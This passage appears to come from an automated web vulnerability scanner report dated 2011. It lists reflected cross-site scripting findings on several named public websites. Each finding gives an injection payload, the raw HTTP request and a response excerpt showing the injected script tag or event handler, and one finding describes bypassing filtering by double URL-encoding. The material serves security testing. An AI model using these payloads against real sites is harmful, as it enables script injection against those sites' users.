Set-Cookie: session=8bd0d740a1e3f55aa6029029f1babb60/1301751361/05455137116852e2aca9e684d063385b; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:36:31 GMT
Cache-Control: must-revalidate
Expires: Sat, 02 Apr 2011 13:36:02 GMT
Last-Modified: Sat, 02 Apr 2011 13:36:01 GMT
Set-Cookie: browser=1.210801301751361255; path=/; expires=Tue, 30-Mar-21 13:36:01 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.rent.com
Content-Length: 20031


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en" class="no-js">
<head>
<title>Error 404: Page Not Found</title>

<link href="http://media.rent.com/css/renter.css?v=8297
...[SNIP]...
<script type="text/javascript">
$().ready(function() {
next_url = '/favicon.icoee0cd';cb0a88443c6';
ajax_img = 'http://media.rent.com/img/global/ajax-loader-blue.gif';
signin_box_state = 'closed';

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>
...[SNIP]...

6.81. http://www.rent.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rent.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a25%2522%253e%253ca%2520b%253dc%253e1df3e30028f was submitted in the REST URL parameter 1. This input was echoed as f5a25"><a b=c>1df3e30028f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.icof5a25%2522%253e%253ca%2520b%253dc%253e1df3e30028f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rent.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:49 GMT
Server: Apache
Set-Cookie: session=10126565fabf461a6858b2961126cae8/1301751350/be94a764a1841ff093210115435aab78; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:36:20 GMT
Cache-Control: must-revalidate
Expires: Sat, 02 Apr 2011 13:35:51 GMT
Last-Modified: Sat, 02 Apr 2011 13:35:50 GMT
Set-Cookie: browser=1.2046613017513502; path=/; expires=Tue, 30-Mar-21 13:35:50 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.rent.com
Content-Length: 20069


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en" class="no-js">
<head>
<title>Error 404: Page Not Found</title>

<link href="http://media.rent.com/css/renter.css?v=8297
...[SNIP]...
<a id="topbar_signin_link_id" class="topbar_signin_link" href="/account/login/" linkname="GlobalHeader_SignIn_Link" rel="/favicon.icof5a25"><a b=c>1df3e30028f">
...[SNIP]...

6.82. http://www.reverbnation.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reverbnation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3eefb<img%20src%3da%20onerror%3dalert(1)>8088e5a0514 was submitted in the REST URL parameter 1. This input was echoed as 3eefb<img src=a onerror=alert(1)>8088e5a0514 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico3eefb<img%20src%3da%20onerror%3dalert(1)>8088e5a0514 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reverbnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:41:53 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n-fips Phusion_Passenger/3.0.4
X-Powered-By:
Cache-Control: no-cache
Set-Cookie: _session_id=bdfe329ab8b312ccf2f484a799176e11; domain=reverbnation.com; path=/; HttpOnly
Content-Length: 21673
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerCust15535_http_new=4032917968.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a href="/main/global_search?q=favicon.ico3eefb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8088e5a0514" rel="nofollow">Search for 'favicon.ico3eefb<img src=a onerror=alert(1)>8088e5a0514'</a>
...[SNIP]...

6.83. http://www.shangri-la.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shangri-la.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 682d8'%3b026f574dde7 was submitted in the REST URL parameter 1. This input was echoed as 682d8';026f574dde7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico682d8'%3b026f574dde7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shangri-la.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-WebServer-By: WEB02
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://www.shangri-la.com
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 15288
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Sat, 02 Apr 2011 13:45:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<script type="text/javascript">
   var share_page_data={};
   share_page_data.page_url = 'http://www.shangri-la.com/Error404.aspx?404;http://www.shangri-la.com:80/favicon.ico682d8';026f574dde7';
   share_page_data.page_name = "Page Not Found";
</script>
...[SNIP]...

6.84. http://www.shopcompanion.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ca3b<img%20src%3da%20onerror%3dalert(1)>4816534cea1 was submitted in the REST URL parameter 1. This input was echoed as 1ca3b<img src=a onerror=alert(1)>4816534cea1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /1ca3b<img%20src%3da%20onerror%3dalert(1)>4816534cea1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:01:14 GMT
Content-Type: text/html; charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR NID CURa OUR NOR PHY UNI DEM PRE"
Set-Cookie: AMOS_SID=_live_ticks%3D1301752873832%26live%3DOEzzw%252Eh~XWhkUXWWzxjwVzhxexzYwVqzjWYUkqWwwmXezhmzm; Path=/; Domain=.shopcompanion.com;
Set-Cookie: AMOS_NS_ID=048; Path=/; Domain=.shopcompanion.com;
Set-Cookie: CC_SRCID=369; Path=/; Domain=www.shopcompanion.com;
Set-Cookie: AMID=2232139994; Path=/; Domain=.shopcompanion.com; Expires=Tuesday, 01-Jan-38 00:00:01 GMT
Set-Cookie: CATALOGCITY_SSNLIVE111=2232139994; Path=/; Domain=.shopcompanion.com;
Set-Cookie: SHOPPER_LOCATION=Monterey%2C+CA%2C+93940%2C+36%2E600111%2C+-121%2E894521%2C+30; Path=/; Domain=www.shopcompanion.com;
Content-Length: 107216

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" t
...[SNIP]...
<span class="span tx_bold">> 1ca3b<img src=a onerror=alert(1)>4816534cea1</span>
...[SNIP]...

6.85. http://www.smarter.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.smarter.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c2201<a>26331e04736 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /c2201<a>26331e04736 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smarter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:23 GMT
Server: Apache
Loader-Time-Used: 0.00018
Set-Cookie: __mmsid=d9c2a77556a5d7bf53b16231f5cfac85; path=/; domain=.smarter.com
Set-Cookie: __mmspn=deleted; expires=Fri, 02-Apr-2010 13:33:22 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmoff=deleted; expires=Fri, 02-Apr-2010 13:33:22 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmuid=66a6612fe3ea8c94b39704425bd47fba; expires=Sat, 02-Apr-2016 13:33:23 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmtrk=-1|||3|4ecd93f7c006897fc2035eac37f86a5b|AwA%3D|0y9O1dUtLNRNNjIyMFQ1MjV2TgSRrkZmxsaGqQYm5sZmehkluTkA; path=/; domain=.smarter.com
Set-Cookie: qry_lnk=deleted; expires=Fri, 02-Apr-2010 13:33:23 GMT; path=/; domain=.smarter.com
Set-Cookie: qry_ctxt=deleted; expires=Fri, 02-Apr-2010 13:33:23 GMT; path=/; domain=.smarter.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 93179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> c2201<A>26331e04736
...[SNIP]...
<h2>How to Shop Smarter for c2201<a>26331e04736: </h2>
...[SNIP]...

6.86. http://www.soft82.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soft82.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99137<script>alert(1)</script>cb264ab5f87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico99137<script>alert(1)</script>cb264ab5f87 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.soft82.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:16:15 GMT
Server: Apache/1.3.42 (Unix) PHP/5.3.4 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=d833dc533a466d6bfc13ec777b9775ab; path=/; domain=.soft82.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 87349

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<BASE href="http://www.soft82.com/">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>
...[SNIP]...
<strong>www.soft82.com/favicon.ico99137<script>alert(1)</script>cb264ab5f87</strong>
...[SNIP]...

6.87. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7297a"-alert(1)-"4c63be965d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7297a"-alert(1)-"4c63be965d1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:14:05 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=8v774711o8lea5jaf5624ak142; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23886


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<script type="text/javascript">
// Note: it's important to keep these in separate script blocks
COMSCORE.beacon({
   c1: 2,
   c2: "6772046",
   c3: "",
   c4: "http://www.songmeanings.net/favicon.ico7297a"-alert(1)-"4c63be965d1", // Replace this with the page URL that the site is on here, and also enter it into the <noscript>
...[SNIP]...

6.88. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427ff"><script>alert(1)</script>13601e9ef95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico427ff"><script>alert(1)</script>13601e9ef95 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:13:57 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=c3e6n99ocvojajgu9q9r37uep5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.songmeanings.net/favicon.ico427ff"><script>alert(1)</script>13601e9ef95&c5=&c6=&c15=&cj=1" />
...[SNIP]...

6.89. http://www.spike.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spike.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78520"><script>alert(1)</script>dd39ddafe43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico78520"><script>alert(1)</script>dd39ddafe43 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spike.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:31:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:44 GMT; path=/
Vary: User-Agent
Content-Length: 33753


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="
...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/spike.com?url=/favicon.ico78520"><script>alert(1)</script>dd39ddafe43&pageType=&cmsPageId=&show=&title=&season=&photoTitle=&spikeTvShow=&channel=" type="text/javascript">
...[SNIP]...

6.90. http://www.supercheats.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supercheats.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0247"%3balert(1)//9ef130d939d was submitted in the REST URL parameter 1. This input was echoed as c0247";alert(1)//9ef130d939d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc0247"%3balert(1)//9ef130d939d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.supercheats.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:43:02 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script>

COMSCORE.beacon({

c1:2,

c2:"6035764",

c3:"",

c4:"http://www.supercheats.com/favicon.icoc0247";alert(1)//9ef130d939d",

c5:"",

c6:"",

c15:""

});

</script>
...[SNIP]...

6.91. http://www.tarot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3ca5'-alert(1)-'190ef52e03b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe3ca5'-alert(1)-'190ef52e03b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:10 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=rkucms4dupord0ov1fcq4vql54; expires=Sun, 01 Apr 2012 14:15:10 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=rkucms4dupord0ov1fcq4vql54; expires=Sat, 23-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcxMDtzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:10 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=rkucms4dupord0ov1fcq4vql54%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:10 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26394

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.icoe3ca5'-alert(1)-'190ef
...[SNIP]...

var random3 = Math.round( Math.random() * 5000230 );

       var URL = ''
           + '&sid=rkucms4dupord0ov1fcq4vql54'
           + '&uid='
           + '&pid=a-self-no'
           + '&site=tarot'
           + '&pg=/favicon.icoe3ca5'-alert(1)-'190ef52e03b'
           + '&pq='
           + '&rf='
           + '&ftr='
           + '&rq='
           + '&res=' + screen.width + 'x' + screen.height
           + '&col=' + c
           + '&brws=' + escape(navigator.appName)
           + '&brv=' + escape(navigator.appVersio
...[SNIP]...

6.92. http://www.tarot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2e1a2--><script>alert(1)</script>539e602d394 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2e1a2--><script>alert(1)</script>539e602d394 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:12 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=768ks8blt3b6jg5qpk26lbenk6; expires=Sun, 01 Apr 2012 14:15:12 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=768ks8blt3b6jg5qpk26lbenk6; expires=Sat, 23-Apr-2011 14:15:12 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcxMztzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:13 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=768ks8blt3b6jg5qpk26lbenk6%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:13 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26531

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.ico2e1a2--><script>alert(1)</script>539e602d394
copyright 1999-2011, Visionary Networks
10.3.1.24
#################################### -->
...[SNIP]...

6.93. http://www.tarot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6937"><script>alert(1)</script>27a4d5e9b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6937"><script>alert(1)</script>27a4d5e9b5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:06 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=rkh1871d7jsqqnuv8sjhgil1f0; expires=Sun, 01 Apr 2012 14:15:07 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=rkh1871d7jsqqnuv8sjhgil1f0; expires=Sat, 23-Apr-2011 14:15:07 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcwNztzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:07 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=rkh1871d7jsqqnuv8sjhgil1f0%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:07 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26518

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.icob6937"><script>alert(1
...[SNIP]...
<INPUT TYPE="hidden" NAME="returnUrl" VALUE="/favicon.icob6937"><script>alert(1)</script>27a4d5e9b5">
...[SNIP]...

6.94. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df34"><script>alert(1)</script>277514e1af2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4df34"><script>alert(1)</script>277514e1af2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailybeast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 02 Apr 2011 13:40:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60091

